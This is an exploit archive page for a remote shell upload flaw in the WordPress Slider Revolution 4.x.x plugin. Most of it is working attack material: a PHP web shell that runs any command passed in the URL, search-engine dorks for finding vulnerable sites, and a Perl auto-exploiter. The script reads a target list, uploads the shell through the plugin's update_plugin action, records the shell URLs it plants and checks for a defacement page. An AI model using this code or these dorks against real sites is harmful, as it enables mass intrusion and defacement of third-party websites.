exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Slider Revolution 4.x.x Shell Upload

WordPress Slider Revolution 4.x.x Shell Upload
Posted Jan 13, 2023
Authored by indoushka

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 91ad27d5b8aae997e047295a60a4b87610223abd915335d38e21feaee0c21334

WordPress Slider Revolution 4.x.x Shell Upload

Change Mirror Download
=================================================================================================
| # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index off revslider\backup |
plugins/revslider/public/assets/css/settings.css |
revslider.php "index of" |
wp-content/plugins/revslider/ 2013 |
=================================================================================================

[+] poc :

[+] Web shell upload :

The following perl exploit will attempt to upload backdoor through the update_plugin function
To use the exploit, be sure to compress the backdoor file with name [revslider.zip]
Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension
Because the exploit uploads a compressed file to the target

[+] simple backdoor :

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine

[+] Perl exploit :

#!/usr/bin/perl

use LWP::UserAgent;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

head();

my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";
die "$usage" unless $ARGV[0];

open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;

my $path = "wp-admin/admin-ajax.php";

print "\nTarget => $target\n";

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "\n [+] Xploit Possibility Work :3\n \n";



print " [*] Try Exploiting Vulnerability\n";
print " [*] Xploiting $target\n";

my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

print " [*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print " [+] Payload successfully executed\n";

print " [*] Checking if shell was uploaded\n";
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;
if($check =~/<br>/) {

print " [+] Shell successfully uploaded\n";
open(save, '>>Shell.txt');
print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";
close(save);


print " [*] Checking if Deface was uploaded now\n";

my $def = $ua->get("$target/leet.html")->content;
if($def = ~/Hacked/) {

print " [+] Deface uploaded successfull\n";


} else {print " [-] Deface not Uploaded :/"; }
} else { print " [-] I'think Shell Not Uploaded :/\n"; }
} else {
print " [-] Payload failed: Fail\n";
print "\n";

}
} else { print "\n [-]Xploit Fail \n"}

sub head {
print "\t +===============================================\n";
print "\t | Auto Exploiter Revslider Shell Upload \n";
print "\t | Edited: indoushka\n";
print "\t +===============================================\n";
}
}

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close